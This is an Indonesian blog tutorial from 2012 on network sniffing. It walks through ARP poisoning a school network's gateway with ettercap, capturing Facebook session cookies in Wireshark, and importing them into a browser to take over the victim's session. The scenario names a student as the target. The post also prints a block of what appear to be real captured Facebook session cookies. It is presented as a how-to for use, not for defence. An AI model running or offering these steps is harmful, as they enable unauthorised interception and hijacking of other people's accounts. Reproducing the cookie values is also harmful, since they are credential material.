Langsung ke konten utama

Teknik Sniffing menggunakan Ubuntu




 Author: Harrid Bunaiya <harridbunaiya@rocketmail.com>                                                              
 Title: Sniffing                                                                                                                              
 Date: Bekasi 13/10/2012                                                                                                                    
 Category: network, system, security                                                                                                  
 Intended: All Categories                                                                                                                    
 Level: Middle                                                                                                                                    
                                                                                                                                                           
 __  __                                              _ _
|    \/    | __  ___  ____           _____|  |   |
|   |\/|   |/ _`   \   \  /   /\   \   /\   /   / _  \   |   |
|   |  |   | (_|   |>   <     \   V  V  /   __/   |   |
| _|  |_ |\__,_/ _/\_ \     \ _ /\ _ / \___|_  |_ |


Daftar Isi:
[1] Pendahuluan/Pengertian
[2] Contoh Kasus
[3] Software Pendukung
[4] Instalasi Software
[5] How To Work


--[1] Pengertian

Sniffing adalah kegiatan melakukan penyadapan data pada suatu jaringan komputer.
Dalam suatu jaringan komputer ada yang disebut dengan istilah 'Paket Data' paket data disini berisi tentang
informasi yang diminta oleh sang client.

MITM (MAN IN THE MIDDLE)

Server ---------> | -------------> Client
                         ^
                     Sniffer

Sniffer <org yang melakukan Sniffing>  ketika paket data tersebut dikirim dari server ke client, paket - paket data tersebut akan
oleh disadap sang Sniffer untuk diambil informasinya.


--[2] Contoh Kasus
Eka sedang membuka halaman facebook pada saat waktu senggan disekolah, Eka membuka facebook pada jaringan sekolah
yang memiliki Gateway 192.168.5.129. Pada saat Eka membuka situs www.facebook.com maka data dari Server facebook menuju Eka
dikirim, pada saat pengiriman inilah sang Sniffer beraksi.


--[3] Software Pendukung

A. Ettercap
B. Wireshark
 C. OS Linux


--[4] Instalasi Software

A. ettercap

- cara install ettercap :

root@m0nk3y:/# apt-get install ettercap

B. wireshark

- cara install wireshark :

root@m0nk3y:/# apt-get install
--[5] How To Work

- Perintah ettercap untuk poison :

root@m0nk3y:/# ettercap -Tq -i wlan0 -M ARP /192.168.5.129/ //
- Jalankan Wireshark
root@m0nk3y:/# wireshark -&


- Pilih interface

- Setelah itu filter menjadi http.cookie
- Cari host apa yg mau di buka

- Buka paket data, klik kanan pilih follow tcp stream

- Copy cookie ke notepad

/*
datr=DA8ZT-C0x9rXeYcI33T-LTMd;
  lu=RgTkJLe_tEgw4wH2nKDtvSIg;
  fr=0JMdVwPS0aS6grvsa.AWWTsCovDfKGxq0CJC0A1gXOTJM.BQciOq.Ar.AWVY6Nwt;
  locale=en_GB;
  i_id=%3Aasync_conf;
  c_user=1302744707;
  xs=61%3ASy8rS--XVXwHtg%3A0%3A1350105537;
  p=1;
 presence=EM350156488EuserFA21302744707A2EstateFDsb2F0Et2F_5b_5dElm2FnullEuct2F1350104942BEtrFnullEtwF94331430EatF1350156042310G350156488437CEchFDp_5f1302744707F12CC;  
        act=1350156036996%2F55%3A2;
  sub=2097152 "
*/

- Masukin cookie nya di cookies manager

- Coba buka www.facebook.com dan lihat hasilnya
Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Nmap ( Network Mapper )

Nmap ( “ Network Mapper ” ) merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya. Meskipun Nmap umumnya digunakan untuk audit keamanan, namun banyak administrator sistem dan jaringan menganggapnya berguna untuk tugas rutin seperti inventori jaringan, mengelola jadwal upgrade layanan, dan melakukan monitoring uptime host atau layanan. Output Nmap adalah sebuah daftar target yang diperiksa, dengan informasi tambahannya tergantung pada opsi yang digunakan. Hal kunci di antara informasi itu adalah “ tab...
Posting Komentar
Baca selengkapnya

IT Forensik

Pengertian IT Forensik IT Forensik adalah cabang dari ilmu komputer tetapi menjurus ke bagian forensik yaitu berkaitan dengan bukti hukum yang ditemukan di komputer dan media penyimpanan digital. Komputer forensik juga dikenal sebagai Digital Forensik yang terdiri dari aplikasi dari ilmu pengetahuan kepada indetifikasi, koleksi, analisa, dan pengujian dari bukti digital. IT Forensik merupakan penggunaan sekumpulan prosedur untuk melakukan pengujian secara menyeluruh suatu sistem komputer dengan mempergunakan software dan tool untuk memelihara barang bukti tindakan kriminal. IT forensik dapat menjelaskan keadaan artefak digital terkini. Artefak Digital dapat mencakup sistem komputer, media penyimpanan (seperti hard disk atau CD-ROM, dokumen elektronik (misalnya pesan email atau gambar JPEG) atau bahkan paket-paket yang secara berurutan bergerak melalui jaringan. Bidang IT Forensik juga memiliki cabang-cabang di dalamnya seperti firewall forensik, forensik jaringan , database...
Posting Komentar
Baca selengkapnya

samba dan tutorialnya di ubuntu

SAMBA - A Fileserver for UNIX System. # Apa itu samba ? Samba (Server Message Blok) adalah sebuah protokol filesharing tidak hanya file tetapi juga printer, yang di buat untuk bisa saling berbagi file dan printer dengan komputer yang menggunakan sistem operasi windows, tidak hanya windows system operasi Unix dan turunannya seperti  linux, bsd, dll juga bisa menggunakan protokol samba ini. # Installasi samba samba di khususkan untuk unix system, sehingga bisa berjalan di semua mesin yg bersistem operasi unix dan turunannya. a. install samba di ubuntu  - menggunakan koneksi internet    #apt-get install samba  - melalui kode sumber (manual install)       1. download samba terbaru di http://ftp.samba.org/pub/samba/    2. extrak file       tar -zxf     samba-3.6.0.tar.gz    3. masuk folder atau direktori samba       cd samba-3.6.0  ...
Posting Komentar
Baca selengkapnya